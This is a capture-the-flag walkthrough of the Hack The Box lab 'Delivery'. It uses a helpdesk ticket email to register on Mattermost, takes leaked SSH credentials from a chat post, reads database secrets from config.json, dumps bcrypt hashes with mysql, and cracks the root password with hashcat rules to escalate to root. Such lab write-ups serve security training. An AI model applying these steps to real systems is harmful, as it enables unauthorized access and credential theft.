Delivery
Linux · Easy
10.10.10.222
Reconnaissance: NMAP
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.222
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=22%CT=1%CU=32936%PV=Y%DS=2%DC=I%G=Y%TM=65B0
OS:DE4A%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=108%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53AS
OS:T11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1=
OS:FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=
OS:M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)
OS:T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.222
631/udp open|filtered ipp
5353/udp open|filtered zeroconf
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1038.41 seconds┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.222 Enumeration: SSH Port 22/tcp
OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Based on the OpenSSH version, the host is likely running Debian Buster (10). The HTTP scripts for TCP 8065 show the string “Mattermost”, so it could be an instance of that open source Slack alternative.
Enumeration: HTTP Port 80/tcp
The site is not really for anything, but does mention checking out the helpdesk for email related support:
view-source:http://10.10.10.222/#
http://10.10.10.222/#contact-us @delivery.htb
┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.222 delivery.htb
10.10.10.222 helpdesk.delivery.htbhttp://helpdesk.delivery.htb/ http://delivery.htb:8065/ http://delivery.htb:8065/login
The link goes to helpdesk.delivery.htb. I’ll add both that subdomain and the base domain (delivery.htb) to my local /etc/hosts file.
The HelpDesk link is the as the one above. The MatterMost server link is to helpdesk.htb:8065, which explains the other port. There’s also some hint here as to the path. I need to get a @delivery.htb email to get access to the MatterMost server.
helpdesk.htb:8065 @delivery.htb
helpdesk.delivery.htb - TCP 80
This is an instance of osTicket:
As a guest user, I can create a ticket: And it will give me a page saying it’s been accepted: The email to add to the ticket is interesting. I’ll note that.
exodus,
You may check the status of your ticket, by navigating to the Check Status page using ticket id: 4264890.
If you want to add more information to your ticket, just email 4264890@delivery.htb.
Thanks,
Support TeamThe Sign In link has a form, as well as a registration link: On clicking “Create an account” and filling out the form, it gives me a page that says a link has been sent to the email to activate it. On HTB, that’s basically a deadend. If I try to log in, it returns this error: If I click the Check Ticket Status link, it asks for an email or ticket number. Because no validation was done of my email when submitting a ticket as a Guest User, I can enter that email and ticket number: This page gives the current ticket, with the option to update it:
http://helpdesk.delivery.htb/tickets.php
4264890
exodus@htb.eudelivery.htb - TCP 8065
The main page here is a login form:
http://delivery.htb/ http://delivery.htb:8065/login
The create account link leads to another form: Submitting also leads to an email confirmation step: Without an email address, not much I can do here.
Shell as maildeliverer
Access to MatterMost: The note above suggested that I needed a @delivery.htb email address to get an account. It looks like it will work without one, but practically, I can’t receive emails at an outside account because HTB labs are not connected to the internet.
I did note that when I created a ticket, it offered the ability to update the ticket over email. I can use that to get the verification email.
I’ll create a ticket and get the email address for it. Then sign up for a MatterMost account:
4264890@delivery.htb
exodus
Password123$$http://helpdesk.delivery.htb/tickets.php
---- Registration Successful ----
Please activate your email by going to:
http://delivery.htb:8065/do_verify_email?token=49zi8zjpe1sabof8xy7ygj5um7hqxex5gmg9ajdancddfspujrdo9siwhfj9kxc8&email=4264890%40delivery.htb Mattermost lets you share messages and files from your PC or phone, with instant search and archiving. For the best experience, download the apps for PC, Mac, iOS and Android from:
Visiting the link in the ticket verifies the account: One logging in, there’s a chance to join a team: On joining that team, there’s a single channel, with some chat from root:
root
9:29 AM
@developers Please update theme to the OSTicket before we go live. Credentials to the server are
maildeliverer:Youve_G0t_Mail!
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"I’ll note creds for the account maildeliverer, as well as a hint that a lot of the passwords on the box are variants of “PleaseSubscribe!”, and a note about how Hashcat rules will find the variants.
SSH: Those creds do work to SSH to the box:
┌──(kali💀kali)-[~]
└─$ ssh maildeliverer@10.10.10.222
Youve_G0t_Mail!
maildeliverer@Delivery:~$ whoami
maildeliverer
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
f085e4---------------------------- Shell as root
Enumeration: MM Config Mattermost stores it’s configuration in /opt/mattermost/config/config.json. The database connection information is in here:
maildeliverer@Delivery:~$ cd /opt/mattermost/config
maildeliverer@Delivery:/opt/mattermost/config$ ls
cloud_defaults.json config.json README.md
"GfycatApiSecret": "3wLVZPiswc3DnaiaFoLkDvB4X0IV6CpMkj4tf2inJRsBY6-FnkT08zGmppWFgeof",
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": falseThe database password is there, along with a hint as to where to go next.
SQL: I’ll connect to the DB with the creds in the config above:
}maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -pCrack_The_MM_Admin_PW mattermot
MariaDB [mattermost]> There’s only the default DB and mattermost:
MariaDB [mattermost]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+I can see from the prompt that I’m already using the mattermost db, but if I needed to switch, use mattermost would do that. The mattermost database has a lot of tables:
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
| Bots |
| ChannelMemberHistory |
| ChannelMembers |
| Channels |
| ClusterDiscovery |
| CommandWebhooks |
| Commands |
| Compliances |
| Emoji |
| FileInfo |
| GroupChannels |
| GroupMembers |
| GroupTeams |
| IncomingWebhooks |
| Jobs |
| Licenses |
| LinkMetadata |
| OAuthAccessData |
| OAuthApps |
| OAuthAuthData |
| OutgoingWebhooks |
| PluginKeyValueStore |
| Posts |
| Preferences |
| ProductNoticeViewState |
| PublicChannels |
| Reactions |
| Roles |
| Schemes |
| Sessions |
| SidebarCategories |
| SidebarChannels |
| Status |
| Systems |
| TeamMembers |
| Teams |
| TermsOfService |
| ThreadMemberships |
| Threads |
| Tokens |
| UploadSessions |
| UserAccessTokens |
| UserGroups |
| UserTermsOfService |
| Users |
+------------------------+I’ll start with the users table:
MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username | Password |
+----------------------------------+--------------------------------------------------------------+
| surveybot | |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| exodus | $2a$10$yjkicDs/LIqpEYOubdn0zODZ6oY0ULXd8mtkvHGk8FNmAaTR1vUVu |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport | |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+A lot of those look like other users or me. I’ll focus on the root user.
Crack Password: I’ll drop the hash into a file:
┌──(kali💀kali)-[~/Desktop]
└─$ nano hash
┌──(kali💀kali)-[~/Desktop]
└─$ cat hash
root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjOBased on the comments from Mattermost, I’ll create a file with the password:
┌──(kali💀kali)-[~/Desktop]
└─$ nano password
┌──(kali💀kali)-[~/Desktop]
└─$ cat password
PleaseSubscribe!Now I can run with a rule file to get different variations on the passwords in the file (just one in this case). There are many in /usr/share/hashcat/rules, but why not start with the one called “best”:
┌──(kali💀kali)-[~/Desktop]
└─$ hashcat -m 3200 hash password --user -r /usr/share/hashcat/rules/best64.rule
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Wed Jan 24 07:11:26 2024 (2 secs)
Time.Estimated...: Wed Jan 24 07:11:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (password)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8 H/s (0.35ms) @ Accel:6 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util: 18%
Started: Wed Jan 24 07:10:37 2024
Stopped: Wed Jan 24 07:11:29 2024It cracks pretty quickly.
su: That password works for the root account on Delivery:
maildeliverer@Delivery:/opt/mattermost/config$ su -
Password: PleaseSubscribe!21
root@Delivery:~# whoami
root
root@Delivery:~# ls
mail.sh note.txt py-smtp.py root.txt
root@Delivery:~# cat root.txt
064c3fd----------------------------Last updated